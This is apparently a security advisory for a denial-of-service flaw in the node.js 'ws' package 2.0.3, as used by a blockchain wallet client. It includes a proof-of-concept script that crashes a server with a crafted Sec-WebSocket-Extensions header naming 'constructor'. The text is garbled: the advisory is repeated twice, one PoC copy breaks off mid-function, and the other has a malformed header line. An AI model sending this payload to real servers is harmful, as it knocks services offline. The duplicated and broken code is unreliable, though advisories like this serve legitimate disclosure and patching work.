Denial of Service (DoS)
Vulnerable module: ws
Introduced through: ws@2.0.3
Detailed paths
Introduced through: blockchain-wallet-client@blockchain/My-Wallet-V3#c0bf5615c862fb8d7ec5e3f5031c2998b8ddc690 › ws@2.0.3
Remediation: Upgrade to ws@3.3.1.
Overview
ws is a simple to use websocket client, server and console for node.js.
Affected versions of this package are vulnerable to Denial of Service (DoS) attacks. A specially crafted value of the Sec-WebSocket-Extensions header that used Object.prototype property names as extension or parameter names could be used to make a ws server crash.
PoC:
const WebSocket = require('ws');
const net = require('net');
const wss = new WebSocket.Server({ port: 3000 }, function () {
const payload = 'constructor'; // or ',;constructor'
Denial of Service (DoS) Vulnerable module: ws Introduced through: ws@2.0.3 Detailed paths Introduced through: blockchain-wallet-client@blockchain/My-Wallet-V3#c0bf5615c862fb8d7ec5e3f5031c2998b8ddc690 › ws@2.0.3 Remediation: Upgrade to ws@3.3.1. Overview ws is a simple to use websocket client, server and console for node.js.
Affected versions of this package are vulnerable to Denial of Service (DoS) attacks. A specially crafted value of the Sec-WebSocket-Extensions header that used Object.prototype property names as extension or parameter names could be used to make a ws server crash.
PoC:
const WebSocket = require('ws'); const net = require('net');
const wss = new WebSocket.Server({ port: 3000 }, function () { const payload = 'constructor'; // or ',;constructor'
const request = [ 'GET / HTTP/1.1', 'Connection: Upgrade', 'Sec-WebSocket-Key: test', 'Sec-WebSocket-Version: 8',
Sec-WebSocket-Extensions: ${payload}, 'Upgrade: websocket', '\r\n' ].join('\r\n');const socket = net.connect(3000, function () { socket.resume(); socket.write(request); }); });